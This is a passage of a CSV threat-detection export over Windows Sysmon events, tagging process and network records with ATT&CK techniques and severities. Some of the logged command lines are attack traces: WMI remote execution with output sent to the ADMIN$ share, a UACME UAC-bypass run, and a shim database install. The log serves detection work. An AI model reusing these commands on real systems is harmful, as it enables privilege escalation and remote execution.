<Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.246714Z"">
</TimeCreated>
<EventRecordID>9827</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.246</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010B1361D00</Data>
<Data Name=""ProcessId"">2504</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.246714Z"">
</TimeCreated>
<EventRecordID>9827</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.246</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010B1361D00</Data>
<Data Name=""ProcessId"">2504</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564911238.127145,2019-08-04T13:33:58.127145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe &quot;C:\Windows\system32\osk.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-04T09:33:58.087775Z"">
</TimeCreated>
<EventRecordID>5764</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-04 09:33:57.876</Data>
<Data Name=""ProcessGuid"">747F3D96-A685-5D46-0000-00100D41D703</Data>
<Data Name=""ProcessId"">3296</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\windows\system32\cmd.exe &quot;C:\Windows\system32\osk.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020FBD31800</Data>
<Data Name=""LogonId"">0x18d3fb</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-A685-5D46-0000-00109B2AD703</Data>
<Data Name=""ParentProcessId"">3916</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Desktop\UACME.exe</Data>
<Data Name=""ParentCommandLine"">UACME.exe 55 c:\Windows\SysWOW64\notepad.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1618950781.944467,2021-04-21T00:33:01.944467+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) ran process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated a network connection from hostname ( MSEDGEWIN10 ) and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 ) (note: destination is the loopback address, i.e. local SMB, not an external host)",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-20T20:33:01.944115Z"">
</TimeCreated>
<EventRecordID>578500</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3392"" ThreadID=""4248"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2021-04-20 20:33:59.834</Data>
<Data Name=""ProcessGuid"">747F3D96-04C3-607F-0000-0010F13B1E00</Data>
<Data Name=""ProcessId"">2532</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">127.0.0.1</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10</Data>
<Data Name=""SourcePort"">49925</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">127.0.0.1</Data>
<Data Name=""DestinationHostname"">MSEDGEWIN10</Data>
<Data Name=""DestinationPort"">445</Data>
<Data Name=""DestinationPortName"">microsoft-ds</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.168589Z"">
</TimeCreated>
<EventRecordID>9826</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.168</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-00105F321D00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.168589Z"">
</TimeCreated>
<EventRecordID>9826</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.168</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-00105F321D00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.168589Z"">
</TimeCreated>
<EventRecordID>9826</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.168</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-00105F321D00</Data>
<Data Name=""ProcessId"">3840</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028584.802196,2019-03-20T00:49:44.802196+04:00,,Threat,High,"[T1138] Application Shimming - process (sdbinst.exe installing shim database C:\Windows\AppPatch\Test.SDB , launched from Compatadmin.exe) , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:49:44.792182Z"">
</TimeCreated>
<EventRecordID>1966408</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:49:44.712</Data>
<Data Name=""ProcessGuid"">365ABB72-55E8-5C91-0000-001037DF0700</Data>
<Data Name=""ProcessId"">4052</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
Command run remotely Using WMI,1607599134.733908,2020-12-10T15:18:54.733908+04:00,,Threat,Critical,"User (NT AUTHORITY\LOCAL SERVICE) ran a command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ) (note: this record shows only the WMI provider host starting with an unknown parent; the process it spawned, if any, is not in this event)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-12-10T11:18:54.600413Z"">
</TimeCreated>
<EventRecordID>549600</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3556"" ThreadID=""4972"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-12-10 11:18:54.576</Data>
<Data Name=""ProcessGuid"">747F3D96-041E-5FD2-0000-001024DF3B00</Data>
<Data Name=""ProcessId"">5580</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">WMI Provider Host</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Wmiprvse.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-7E79-5FD2-0000-0020E5030000</Data>
<Data Name=""LogonId"">0x3e5</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">832</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1618950781.944115,2021-04-21T00:33:01.944115+04:00,,Threat,Low,Found User (MSEDGEWIN10\user03) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-20T20:33:00.384036Z"">
</TimeCreated>
<EventRecordID>578499</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3392"" ThreadID=""4112"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-04-20 20:33:00.318</Data>
<Data Name=""ProcessGuid"">747F3D96-3A7C-607F-0000-001058067700</Data>
<Data Name=""ProcessId"">2740</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\user03</Data>
<Data Name=""LogonGuid"">747F3D96-3A7C-607F-0000-002075057700</Data>
<Data Name=""LogonId"">0x770575</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-3A77-607F-0000-00105DD17600</Data>
<Data Name=""ParentProcessId"">7280</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1579034691.122589,2020-01-15T00:44:51.122589+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd.exe&quot; /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:44:51.016110Z"">
</TimeCreated>
<EventRecordID>337</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:44:50.978</Data>
<Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-0010745E7A00</Data>
<Data Name=""ProcessId"">1568</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
